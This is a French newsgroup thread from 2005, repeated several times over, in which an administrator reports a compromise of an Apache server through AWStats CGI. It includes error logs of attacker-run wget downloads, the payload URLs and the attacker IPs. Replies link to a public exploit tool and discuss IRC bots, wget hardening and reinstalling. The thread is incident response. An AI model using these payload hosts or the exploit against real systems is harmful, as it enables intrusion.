J'ai été victime d'un piratage d'un serveur apache 2 équipé de awstats en
cgi. Apparament, des SK ont utilisé mon système pour télécharger des trucs
pas très catholiques. Je ne savais pas que awstats était si sensible/
J'ai conservé tous les logs, bien sûr
les clients incriminés sont:
82.77.209.42
66.148.165.235
les fichiers téléchargés sont:
soit des executables
'anacrond'
'awstats.pl'
'https'
'proc'
ou des tar.gz qui sont des sources:
b.tar.gz
gradina.tar.gz
Les adresses où se sont connectés les pirates sont:
http://zburchi.idilis.ro/https
http://adrians.lx.ro/proc
http://iceghost.go.ro/anacrond
apparament, c'est surout en roumanie
les logs se manifestent de la façon suivante dans le error log de apache,
c'est très voyant, peu dans le access log
[Sun Mar 20 17:23:40 2005] [error] [client 66.148.165.235] sh: line
1: /awstats.mon_site_internet.com.conf: No such file or directory
[Sun Mar 20 17:24:18 2005] [error] [client 66.148.165.235] sh: line
1: /awstats.mon_site_internet.com.conf: No such file or directory
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] --17:24:38--
http://adrians.lx.ro/proc
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] =>
`proc'
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] Resolving
adrians.lx.ro...
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] 66.230.157.75
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] Connecting to
adrians.lx.ro[66.230.157.75]:80...
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] connected.
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] HTTP request
sent, awaiting response...
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] 200 OK
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] Length:
unspecified [application/octet-stream]
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235]
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] 0K .
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] ..
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] ..
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] . .
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] ..
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] ..
[Sun Mar 20 17:24:38 2005] [error] [client
66.148.165.235] . ??% 71.1K
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235]
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] 17:24:38 (70.88
KB/s) - `proc' saved [19,578]
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235]
[Sun Mar 20 17:24:38 2005] [error] [client 66.148.165.235] sh: line
1: /awstats.mon_site_internet.com.conf: No such file or directory
[Sun Mar 20 17:24:45 2005] [error] [client 200.217.110.54] File does not
exist: /usr/share/awstats/icon/awstats.pl
[Sun Mar 20 17:24:53 2005] [error] [client 66.148.165.235] sh: line
1: /awstats.mon_site_internet.com.conf: No such file or directory
[client 65.54.188.65] script '/mnt/data/websites/meme-anna/web/sondages.php'
not found or unable to stat
[Sun Mar 20 17:33:01 2005] [error] [client 66.148.165.235] sh: line
1: /awstats.mon_site_internet.com.conf: No such file or directory
[Sun Mar 20 17:33:05 2005] [error] [client 66.148.165.235] sh: line
1: /awstats.mon_site_internet.com.conf: No such file or directory
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] --17:33:18--
http://zburchi.idilis.ro/https
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] =>
`https'
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] Resolving
zburchi.idilis.ro...
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] 217.156.85.3
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235]
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] Connecting to
zburchi.idilis.ro[217.156.85.3]:80...
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] connected.
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] HTTP request
sent, awaiting response...
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] 200 OK
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] Length: 19,807
[text/plain]
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235]
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] 0K .
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] ..
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] ..
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] . .
[Sun Mar 20 17:33:18 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:33:19 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:33:19 2005] [error] [client 66.148.165.235] ..
[Sun Mar 20 17:33:19 2005] [error] [client 66.148.165.235] .
[Sun Mar 20 17:33:19 2005] [error] [client 66.148.165.235] ..
[Sun Mar 20 17:33:19 2005] [error] [client 66.148.165.235] .
100% 117K
[Sun Mar 20 17:33:19 2005] [error] [client 66.148.165.235]
[Sun Mar 20 17:33:19 2005] [error] [client 66.148.165.235] 17:33:19 (116.90
KB/s) - `https' saved [19,807/19,807]
[Sun Mar 20 17:33:19 2005] [error] [client 66.148.165.235]
[Sun Mar 20 17:33:19 2005] [error] [client 66.148.165.235] sh: line
1: /awstats.mon_site_internet.com.conf: No such file or directory
[Sun Mar 20 17:38:19 2005] [error] [client 66.148.165.235] (70007)The
timeout specified has expired: ap_content_length_filter: apr_bucket_read()
failed
Bon ben voilà, ça dit quelque chose à quelqu'un
J'ai tout bloqué les CGI, signalé partout, faites gaffe vous qui avez
awstats installé en CGI
J'ai été victime d'un piratage d'un serveur apache 2 équipé de awstats en cgi. Apparament, des SK ont utilisé mon système pour télécharger des trucs pas très catholiques. Je ne savais pas que awstats était si sensible/
Heu? Il y a wget installé sur la machine???
Exemple de sortie de wget en telechargement:<<EOF Resolving www.google.be... done. Connecting to www.google.be[66.102.9.104]:80... connected. HTTP request sent, awaiting response... 302 Found Location: http://www.google.be/ [following] --23:30:18-- http://www.google.be/ => `index.html.3' Connecting to www.google.be[66.102.9.104]:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html]
Ca ressemble tres fort à ce que se trouve dans le log... non?
Portaudit dit ça: Affected package: wget-1.8.2_6 Type of problem: wget -- multiple vulnerabilities. Reference: <www.FreeBSD.org/ports/portaudit/06f142ff-4df3-11d9-a9e7-0001020eed82.html> You are advised to update or deinstall the affected package(s) immediately. #pkg_delete wget-1.8.2_6
Vulnérabilités: Wget erroneously thinks that the current directory is a fair game, and will happily write in any file in and below it. Malicious HTTP response or malicious HTML file can redirect wget to a file that is vital to the system, and wget will create/append/overwrite it.
Wget apparently has at least two methods of ``sanitizing'' the potentially malicious data it receives from the HTTP stream, therefore a malicious redirects can pass the check. We haven't find a way to trick wget into writing above the parent directory, which doesn't mean it's not possible.
Malicious HTTP response can overwrite parts of the terminal so that the user will not notice anything wrong, or will believe the error was not fatal.
Pour AWstats en rouge sur le site (awstats.sourceforge.net): Warning, a security hole was recently found in AWStats versions from 5.0 to 6.3 (Partially fixed in 6.3) when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody"). If you use AWStats with a more recent version or if AWStats is not available as a CGI, you are safe. If not, it is highly recommanded to upgrade to 6.4 version that fix all known security holes.
J'aimerais bien connaitre la technique du SK pour tester sur ma machine voir si ça à une chance de fonctionner. Des commentaires sur les métodes???
HTH -- MaXX
HelloMan wrote:
Hello
J'ai été victime d'un piratage d'un serveur apache 2 équipé de
awstats en
cgi. Apparament, des SK ont utilisé mon système pour télécharger des trucs
pas très catholiques. Je ne savais pas que awstats était si sensible/
Heu? Il y a wget installé sur la machine???
Exemple de sortie de wget en telechargement:<<EOF
Resolving www.google.be... done.
Connecting to www.google.be[66.102.9.104]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.google.be/ [following]
--23:30:18-- http://www.google.be/
=> `index.html.3'
Connecting to www.google.be[66.102.9.104]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Ca ressemble tres fort à ce que se trouve dans le log... non?
Portaudit dit ça:
Affected package: wget-1.8.2_6
Type of problem: wget -- multiple vulnerabilities.
Reference:
<www.FreeBSD.org/ports/portaudit/06f142ff-4df3-11d9-a9e7-0001020eed82.html>
You are advised to update or deinstall the affected package(s) immediately.
#pkg_delete wget-1.8.2_6
Vulnérabilités:
Wget erroneously thinks that the current directory is a fair game, and
will happily write in any file in and below it. Malicious HTTP response or
malicious HTML file can redirect wget to a file that is vital to the
system, and wget will create/append/overwrite it.
Wget apparently has at least two methods of ``sanitizing'' the potentially
malicious data it receives from the HTTP stream, therefore a malicious
redirects can pass the check. We haven't find a way to trick wget into
writing above the parent directory, which doesn't mean it's not possible.
Malicious HTTP response can overwrite parts of the terminal so that the
user will not notice anything wrong, or will believe the error was not
fatal.
Pour AWstats en rouge sur le site (awstats.sourceforge.net):
Warning, a security hole was recently found in AWStats versions from 5.0 to
6.3 (Partially fixed in 6.3) when AWStats is used as a CGI: A remote user
can execute arbitrary commands on your server using permissions of your web
server user (in most cases user "nobody").
If you use AWStats with a more recent version or if AWStats is not
available as a CGI, you are safe. If not, it is highly recommanded to
upgrade to 6.4 version that fix all known security holes.
J'aimerais bien connaitre la technique du SK pour tester sur ma machine voir
si ça à une chance de fonctionner. Des commentaires sur les métodes???
J'ai été victime d'un piratage d'un serveur apache 2 équipé de awstats en cgi. Apparament, des SK ont utilisé mon système pour télécharger des trucs pas très catholiques. Je ne savais pas que awstats était si sensible/
Heu? Il y a wget installé sur la machine???
Exemple de sortie de wget en telechargement:<<EOF Resolving www.google.be... done. Connecting to www.google.be[66.102.9.104]:80... connected. HTTP request sent, awaiting response... 302 Found Location: http://www.google.be/ [following] --23:30:18-- http://www.google.be/ => `index.html.3' Connecting to www.google.be[66.102.9.104]:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html]
Ca ressemble tres fort à ce que se trouve dans le log... non?
Portaudit dit ça: Affected package: wget-1.8.2_6 Type of problem: wget -- multiple vulnerabilities. Reference: <www.FreeBSD.org/ports/portaudit/06f142ff-4df3-11d9-a9e7-0001020eed82.html> You are advised to update or deinstall the affected package(s) immediately. #pkg_delete wget-1.8.2_6
Vulnérabilités: Wget erroneously thinks that the current directory is a fair game, and will happily write in any file in and below it. Malicious HTTP response or malicious HTML file can redirect wget to a file that is vital to the system, and wget will create/append/overwrite it.
Wget apparently has at least two methods of ``sanitizing'' the potentially malicious data it receives from the HTTP stream, therefore a malicious redirects can pass the check. We haven't find a way to trick wget into writing above the parent directory, which doesn't mean it's not possible.
Malicious HTTP response can overwrite parts of the terminal so that the user will not notice anything wrong, or will believe the error was not fatal.
Pour AWstats en rouge sur le site (awstats.sourceforge.net): Warning, a security hole was recently found in AWStats versions from 5.0 to 6.3 (Partially fixed in 6.3) when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody"). If you use AWStats with a more recent version or if AWStats is not available as a CGI, you are safe. If not, it is highly recommanded to upgrade to 6.4 version that fix all known security holes.
J'aimerais bien connaitre la technique du SK pour tester sur ma machine voir si ça à une chance de fonctionner. Des commentaires sur les métodes???
HTH -- MaXX
HelloMan
MaXX wrote:
HelloMan wrote:
Hello
J'ai été victime d'un piratage d'un serveur apache 2 équipé de awstats en cgi. Apparament, des SK ont utilisé mon système pour télécharger des trucs pas très catholiques. Je ne savais pas que awstats était si sensible/
Heu? Il y a wget installé sur la machine???
Yes, effectivement
Ca ressemble tres fort à ce que se trouve dans le log... non?
Bien sûr, ils ont téléchargé des trux à la con, mais j'ai tout conservé. pour analyse éventuelle
Portaudit dit ça: Affected package: wget-1.8.2_6 Type of problem: wget -- multiple vulnerabilities. Reference:
rpm -qa | grep wget wget-1.9.1-4.1.101mdk suis sous nunux, mdk10.1
J'aimerais bien connaitre la technique du SK pour tester sur ma machine voir si ça à une chance de fonctionner. Des commentaires sur les métodes???
Ben, apparament, ils ont utilisé la faille de awstats pour obtenir un shell, puis wget; après, je sais pas trop, en fait je m'en suis rendu compte dimanche en me connectant sur la bcane, j'ai vu que le %proc était au taquet, alors qu'il n'y avait rien de particulier en cours. un ps aux m'a montré que le processus incriminé était perl, je n'ai pas vu quel executable perl était en cause.
j'ai tue le perl (sigkill) en question, réponse: 2 processus tués; mauuuuvaiiiiiis
ps aux m'a également montré que l'utilisateur proftpd faisait tourner apache (user apache normalement) ouuuuuaaaaaaiiiiiis; tué également
mais ppffff, sais pas trop ce qui a pu être fait....!
je pense; sans en être sur qu'il s'agissait de faire tourner des bots irc, au vu des sources qu'ils avaient téléchargés.
qqun a des infos sur le sujet ?
MaXX wrote:
HelloMan wrote:
Hello
J'ai été victime d'un piratage d'un serveur apache 2 équipé de
awstats en
cgi. Apparament, des SK ont utilisé mon système pour télécharger des
trucs pas très catholiques. Je ne savais pas que awstats était si
sensible/
Heu? Il y a wget installé sur la machine???
Yes, effectivement
Ca ressemble tres fort à ce que se trouve dans le log... non?
Bien sûr, ils ont téléchargé des trux à la con, mais j'ai tout conservé.
pour analyse éventuelle
Portaudit dit ça:
Affected package: wget-1.8.2_6
Type of problem: wget -- multiple vulnerabilities.
Reference:
rpm -qa | grep wget
wget-1.9.1-4.1.101mdk
suis sous nunux, mdk10.1
J'aimerais bien connaitre la technique du SK pour tester sur ma machine
voir si ça à une chance de fonctionner. Des commentaires sur les
métodes???
Ben, apparament, ils ont utilisé la faille de awstats pour obtenir un shell,
puis wget; après, je sais pas trop, en fait je m'en suis rendu compte
dimanche en me connectant sur la bcane, j'ai vu que le %proc était au
taquet, alors qu'il n'y avait rien de particulier en cours.
un ps aux m'a montré que le processus incriminé était perl, je n'ai pas vu
quel executable perl était en cause.
j'ai tue le perl (sigkill) en question, réponse: 2 processus tués;
mauuuuvaiiiiiis
ps aux m'a également montré que l'utilisateur proftpd faisait tourner apache
(user apache normalement) ouuuuuaaaaaaiiiiiis; tué également
mais ppffff, sais pas trop ce qui a pu être fait....!
je pense; sans en être sur qu'il s'agissait de faire tourner des bots irc,
au vu des sources qu'ils avaient téléchargés.
J'ai été victime d'un piratage d'un serveur apache 2 équipé de awstats en cgi. Apparament, des SK ont utilisé mon système pour télécharger des trucs pas très catholiques. Je ne savais pas que awstats était si sensible/
Heu? Il y a wget installé sur la machine???
Yes, effectivement
Ca ressemble tres fort à ce que se trouve dans le log... non?
Bien sûr, ils ont téléchargé des trux à la con, mais j'ai tout conservé. pour analyse éventuelle
Portaudit dit ça: Affected package: wget-1.8.2_6 Type of problem: wget -- multiple vulnerabilities. Reference:
rpm -qa | grep wget wget-1.9.1-4.1.101mdk suis sous nunux, mdk10.1
J'aimerais bien connaitre la technique du SK pour tester sur ma machine voir si ça à une chance de fonctionner. Des commentaires sur les métodes???
Ben, apparament, ils ont utilisé la faille de awstats pour obtenir un shell, puis wget; après, je sais pas trop, en fait je m'en suis rendu compte dimanche en me connectant sur la bcane, j'ai vu que le %proc était au taquet, alors qu'il n'y avait rien de particulier en cours. un ps aux m'a montré que le processus incriminé était perl, je n'ai pas vu quel executable perl était en cause.
j'ai tue le perl (sigkill) en question, réponse: 2 processus tués; mauuuuvaiiiiiis
ps aux m'a également montré que l'utilisateur proftpd faisait tourner apache (user apache normalement) ouuuuuaaaaaaiiiiiis; tué également
mais ppffff, sais pas trop ce qui a pu être fait....!
je pense; sans en être sur qu'il s'agissait de faire tourner des bots irc, au vu des sources qu'ils avaient téléchargés.
qqun a des infos sur le sujet ?
Nicob
On Sun, 20 Mar 2005 21:17:47 +0000, HelloMan wrote:
Je ne savais pas que awstats était si sensible
Tout programme "accessible" (au sens le plus large possible) depuis l'extérieur est sensible, que ce soit un serveur FTP, un IDS ou un script présent sur un serveur Web.
En l'occurence, pour awstats, y a effectivement une palanquée de failles récemment sorties. Pour le code d'exploitation, il y a quelques outils qui permettent d'exploiter indifféremment l'une ou l'autre des failles :
http://dtors.ath.cx/security/awstats_shell.c
Nicob
On Sun, 20 Mar 2005 21:17:47 +0000, HelloMan wrote:
Je ne savais pas que awstats était si sensible
Tout programme "accessible" (au sens le plus large possible) depuis
l'extérieur est sensible, que ce soit un serveur FTP, un IDS ou un script
présent sur un serveur Web.
En l'occurence, pour awstats, y a effectivement une palanquée de failles
récemment sorties. Pour le code d'exploitation, il y a quelques outils
qui permettent d'exploiter indifféremment l'une ou l'autre des failles :
On Sun, 20 Mar 2005 21:17:47 +0000, HelloMan wrote:
Je ne savais pas que awstats était si sensible
Tout programme "accessible" (au sens le plus large possible) depuis l'extérieur est sensible, que ce soit un serveur FTP, un IDS ou un script présent sur un serveur Web.
En l'occurence, pour awstats, y a effectivement une palanquée de failles récemment sorties. Pour le code d'exploitation, il y a quelques outils qui permettent d'exploiter indifféremment l'une ou l'autre des failles :
http://dtors.ath.cx/security/awstats_shell.c
Nicob
Michel Arboi
On Sun Mar 20 2005 at 22:17, HelloMan wrote:
J'ai été victime d'un piratage d'un serveur apache 2 équipé de awstats en cgi. Je ne savais pas que awstats était si sensible/
On Mon, 21 Mar 2005 09:39:05 +0000, Michel Arboi wrote:
Ce serait corrigé en 6.3
Euh ... c'est plutôt v6.4 pour être tranquille.
Extrait du ChangeLog de v6.4 : "Fix security hole that allowed a user to read log file content even when plugin rawlog was not enabled."
Nicob
Sebastien Vincent
Hello
Salut :)
J'ai été victime d'un piratage d'un serveur apache 2 équipé de awstats en cgi. Apparament, des SK ont utilisé mon système pour télécharger des trucs pas très catholiques. Je ne savais pas que awstats était si sensible/ Heu? Il y a wget installé sur la machine???
Yes, effectivement
Alors : 1 - Awstat est sensible, ca fait deja quelques semaines que des exploits publics courent partout :) 2 - Wget on s'en moque un peu (lui ou un autre, la faille ne viens pas de la).
Alors soit tu lui fait un petit 750 /usr/bin/wget chown toi:download /usr/bin/wget
Avec ton propre groupe "download" autorisé a utiliser wget. On oublie souvent lynx, mais lynx --source http://site/file > /tmp/file marche bien, meme politique.
Ca ressemble tres fort à ce que se trouve dans le log... non? Bien sûr, ils ont téléchargé des trux à la con, mais j'ai tout conservé.
pour analyse éventuelle
Je suis interessé de les recevoir par mail moi, j'aimerais bien voir les analyser un peu (surtout que je débute un peu dans le domaine de l'analyse ELF ca serait formateur :))
J'aimerais bien connaitre la technique du SK pour tester sur ma machine voir si ça à une chance de fonctionner. Des commentaires sur les métodes??? Ben, apparament, ils ont utilisé la faille de awstats pour obtenir un shell,
puis wget; après, je sais pas trop, en fait je m'en suis rendu compte dimanche en me connectant sur la bcane, j'ai vu que le %proc était au taquet, alors qu'il n'y avait rien de particulier en cours. un ps aux m'a montré que le processus incriminé était perl, je n'ai pas vu quel executable perl était en cause.
Clair, awstat est le trou utilisé. Le proc a 100% hum pas bon, a part le test d'une faille de sécurité aggressive (parcourt de la mémoire de mremap() par exemple) je ne vois pas l'interet de lancer un processus lourd ca ferais "perdre" le host plus rapidement car repéré facilement.
j'ai tue le perl (sigkill) en question, réponse: 2 processus tués; mauuuuvaiiiiiis ps aux m'a également montré que l'utilisateur proftpd faisait tourner apache (user apache normalement) ouuuuuaaaaaaiiiiiis; tué également
Je ne vois pas ce qu'il a essayé de faire la franchement pas, mais il faut etre root pour le faire amha...
mais ppffff, sais pas trop ce qui a pu être fait....!
On est deux.
je pense; sans en être sur qu'il s'agissait de faire tourner des bots irc, au vu des sources qu'ils avaient téléchargés.
Bah des warbots et/ou bouncer :) Ca permet de lancer des attaques depuis ton serveur.
qqun a des infos sur le sujet ?
La franchement, il semble qu'il y ai eu compromission root, si tu as des solides connaissances de ton systeme, tu peux partir a la recherche de la backdoor (s'il n'y en a qu'une) mais c'est un travail long et laborieux que je ne saurais te recommander. Reinstalle from scratch...
Amicalement,
Seb :)
Hello
Salut :)
J'ai été victime d'un piratage d'un serveur apache 2 équipé de
awstats en
cgi. Apparament, des SK ont utilisé mon système pour télécharger des
trucs pas très catholiques. Je ne savais pas que awstats était si
sensible/
Heu? Il y a wget installé sur la machine???
Yes, effectivement
Alors :
1 - Awstat est sensible, ca fait deja quelques semaines que des
exploits publics courent partout :)
2 - Wget on s'en moque un peu (lui ou un autre, la faille ne viens pas
de la).
Alors soit tu lui fait un petit
750 /usr/bin/wget
chown toi:download /usr/bin/wget
Avec ton propre groupe "download" autorisé a utiliser wget.
On oublie souvent lynx, mais lynx --source http://site/file > /tmp/file
marche bien, meme politique.
Ca ressemble tres fort à ce que se trouve dans le log... non?
Bien sûr, ils ont téléchargé des trux à la con, mais j'ai tout conservé.
pour analyse éventuelle
Je suis interessé de les recevoir par mail moi, j'aimerais bien voir les
analyser un peu (surtout que je débute un peu dans le domaine de
l'analyse ELF ca serait formateur :))
J'aimerais bien connaitre la technique du SK pour tester sur ma machine
voir si ça à une chance de fonctionner. Des commentaires sur les
métodes???
Ben, apparament, ils ont utilisé la faille de awstats pour obtenir un shell,
puis wget; après, je sais pas trop, en fait je m'en suis rendu compte
dimanche en me connectant sur la bcane, j'ai vu que le %proc était au
taquet, alors qu'il n'y avait rien de particulier en cours.
un ps aux m'a montré que le processus incriminé était perl, je n'ai pas vu
quel executable perl était en cause.
Clair, awstat est le trou utilisé. Le proc a 100% hum pas bon, a part le
test d'une faille de sécurité aggressive (parcourt de la mémoire de
mremap() par exemple) je ne vois pas l'interet de lancer un processus
lourd ca ferais "perdre" le host plus rapidement car repéré facilement.
j'ai tue le perl (sigkill) en question, réponse: 2 processus tués;
mauuuuvaiiiiiis
ps aux m'a également montré que l'utilisateur proftpd faisait tourner apache
(user apache normalement) ouuuuuaaaaaaiiiiiis; tué également
Je ne vois pas ce qu'il a essayé de faire la franchement pas, mais il
faut etre root pour le faire amha...
mais ppffff, sais pas trop ce qui a pu être fait....!
On est deux.
je pense; sans en être sur qu'il s'agissait de faire tourner des bots irc,
au vu des sources qu'ils avaient téléchargés.
Bah des warbots et/ou bouncer :)
Ca permet de lancer des attaques depuis ton serveur.
qqun a des infos sur le sujet ?
La franchement, il semble qu'il y ai eu compromission root, si tu as des
solides connaissances de ton systeme, tu peux partir a la recherche de
la backdoor (s'il n'y en a qu'une) mais c'est un travail long et
laborieux que je ne saurais te recommander. Reinstalle from scratch...
J'ai été victime d'un piratage d'un serveur apache 2 équipé de awstats en cgi. Apparament, des SK ont utilisé mon système pour télécharger des trucs pas très catholiques. Je ne savais pas que awstats était si sensible/ Heu? Il y a wget installé sur la machine???
Yes, effectivement
Alors : 1 - Awstat est sensible, ca fait deja quelques semaines que des exploits publics courent partout :) 2 - Wget on s'en moque un peu (lui ou un autre, la faille ne viens pas de la).
Alors soit tu lui fait un petit 750 /usr/bin/wget chown toi:download /usr/bin/wget
Avec ton propre groupe "download" autorisé a utiliser wget. On oublie souvent lynx, mais lynx --source http://site/file > /tmp/file marche bien, meme politique.
Ca ressemble tres fort à ce que se trouve dans le log... non? Bien sûr, ils ont téléchargé des trux à la con, mais j'ai tout conservé.
pour analyse éventuelle
Je suis interessé de les recevoir par mail moi, j'aimerais bien voir les analyser un peu (surtout que je débute un peu dans le domaine de l'analyse ELF ca serait formateur :))
J'aimerais bien connaitre la technique du SK pour tester sur ma machine voir si ça à une chance de fonctionner. Des commentaires sur les métodes??? Ben, apparament, ils ont utilisé la faille de awstats pour obtenir un shell,
puis wget; après, je sais pas trop, en fait je m'en suis rendu compte dimanche en me connectant sur la bcane, j'ai vu que le %proc était au taquet, alors qu'il n'y avait rien de particulier en cours. un ps aux m'a montré que le processus incriminé était perl, je n'ai pas vu quel executable perl était en cause.
Clair, awstat est le trou utilisé. Le proc a 100% hum pas bon, a part le test d'une faille de sécurité aggressive (parcourt de la mémoire de mremap() par exemple) je ne vois pas l'interet de lancer un processus lourd ca ferais "perdre" le host plus rapidement car repéré facilement.
j'ai tue le perl (sigkill) en question, réponse: 2 processus tués; mauuuuvaiiiiiis ps aux m'a également montré que l'utilisateur proftpd faisait tourner apache (user apache normalement) ouuuuuaaaaaaiiiiiis; tué également
Je ne vois pas ce qu'il a essayé de faire la franchement pas, mais il faut etre root pour le faire amha...
mais ppffff, sais pas trop ce qui a pu être fait....!
On est deux.
je pense; sans en être sur qu'il s'agissait de faire tourner des bots irc, au vu des sources qu'ils avaient téléchargés.
Bah des warbots et/ou bouncer :) Ca permet de lancer des attaques depuis ton serveur.
qqun a des infos sur le sujet ?
La franchement, il semble qu'il y ai eu compromission root, si tu as des solides connaissances de ton systeme, tu peux partir a la recherche de la backdoor (s'il n'y en a qu'une) mais c'est un travail long et laborieux que je ne saurais te recommander. Reinstalle from scratch...
Amicalement,
Seb :)
HelloMan
Michel Arboi wrote:
Ce serait corrigé en 6.3
Il parait plutot en 6.4. Attention, je viens de me rendre compte que j'avais installé awstats sous forme de RPM depuis le cd d'install. Je fais une mise à jour des rpm plusieurs fois par semaine. La machine incriminée est sous MDK 10.1. Or, il n'y a jamais eu de correctif de awstats disponnible de publié dans les Mandrakeupdates.
donc
Tous les systèmes mandrake 10.1 ayant installé awstats sous forme de rpm a partir du cd / DVD sont donc encore en version 6.1, donc potentiellement vulnérables.
Je conseille donc à ceux qui sont dans ce cas à prendre les mesures nécessaires.
ACHTUNG
J'ai conservé tous les logs, bien sûr
Et réinstallé le système ?
en cours
les fichiers téléchargés sont: [...]
ou des tar.gz qui sont des sources: [...]
Tu as gardé tout ça dans un coin (avant de réinstaller) ?
Oui, bien sur, c'est strange.
Michel Arboi wrote:
Ce serait corrigé en 6.3
Il parait plutot en 6.4.
Attention, je viens de me rendre compte que j'avais installé awstats sous
forme de RPM depuis le cd d'install. Je fais une mise à jour des rpm
plusieurs fois par semaine. La machine incriminée est sous MDK 10.1. Or, il
n'y a jamais eu de correctif de awstats disponnible de publié dans les
Mandrakeupdates.
donc
Tous les systèmes mandrake 10.1 ayant installé awstats sous forme de rpm a
partir du cd / DVD sont donc encore en version 6.1, donc potentiellement
vulnérables.
Je conseille donc à ceux qui sont dans ce cas à prendre les mesures
nécessaires.
ACHTUNG
J'ai conservé tous les logs, bien sûr
Et réinstallé le système ?
en cours
les fichiers téléchargés sont:
[...]
ou des tar.gz qui sont des sources:
[...]
Tu as gardé tout ça dans un coin (avant de réinstaller) ?
Il parait plutot en 6.4. Attention, je viens de me rendre compte que j'avais installé awstats sous forme de RPM depuis le cd d'install. Je fais une mise à jour des rpm plusieurs fois par semaine. La machine incriminée est sous MDK 10.1. Or, il n'y a jamais eu de correctif de awstats disponnible de publié dans les Mandrakeupdates.
donc
Tous les systèmes mandrake 10.1 ayant installé awstats sous forme de rpm a partir du cd / DVD sont donc encore en version 6.1, donc potentiellement vulnérables.
Je conseille donc à ceux qui sont dans ce cas à prendre les mesures nécessaires.
ACHTUNG
J'ai conservé tous les logs, bien sûr
Et réinstallé le système ?
en cours
les fichiers téléchargés sont: [...]
ou des tar.gz qui sont des sources: [...]
Tu as gardé tout ça dans un coin (avant de réinstaller) ?
Oui, bien sur, c'est strange.
HelloMan
Désolé
Contrairement à ce que je disais ci - dessus, je n'avais pas installé awstats depuis le cd d'install de la mandrake, puisque, je viens de vérifier, ce RPM est absent de la distribe de base
désolé, correctif
Désolé
Contrairement à ce que je disais ci - dessus, je n'avais pas installé
awstats depuis le cd d'install de la mandrake, puisque, je viens de
vérifier, ce RPM est absent de la distribe de base
Contrairement à ce que je disais ci - dessus, je n'avais pas installé awstats depuis le cd d'install de la mandrake, puisque, je viens de vérifier, ce RPM est absent de la distribe de base
désolé, correctif
HelloMan
mais ppffff, sais pas trop ce qui a pu être fait....!
On est deux.
c'est pénible
je pense; sans en être sur qu'il s'agissait de faire tourner des bots irc, au vu des sources qu'ils avaient téléchargés.
Bah des warbots et/ou bouncer :) Ca permet de lancer des attaques depuis ton serveur.
J'ai vérifié immédiatement sur dshield, apparament je suis clair, mais cela ne veut rien dire
La franchement, il semble qu'il y ai eu compromission root, si tu as des solides connaissances de ton systeme, tu peux partir a la recherche de la backdoor (s'il n'y en a qu'une) mais c'est un travail long et laborieux que je ne saurais te recommander. Reinstalle from scratch...
Yeah, comme sous windows !!!
en cours, merci de vos infos.
PS: tout cela m'accélère la dernière étape du transit intestinal
mais ppffff, sais pas trop ce qui a pu être fait....!
On est deux.
c'est pénible
je pense; sans en être sur qu'il s'agissait de faire tourner des bots
irc, au vu des sources qu'ils avaient téléchargés.
Bah des warbots et/ou bouncer :)
Ca permet de lancer des attaques depuis ton serveur.
J'ai vérifié immédiatement sur dshield, apparament je suis clair, mais cela
ne veut rien dire
La franchement, il semble qu'il y ai eu compromission root, si tu as des
solides connaissances de ton systeme, tu peux partir a la recherche de
la backdoor (s'il n'y en a qu'une) mais c'est un travail long et
laborieux que je ne saurais te recommander. Reinstalle from scratch...
Yeah, comme sous windows !!!
en cours, merci de vos infos.
PS: tout cela m'accélère la dernière étape du transit intestinal
mais ppffff, sais pas trop ce qui a pu être fait....!
On est deux.
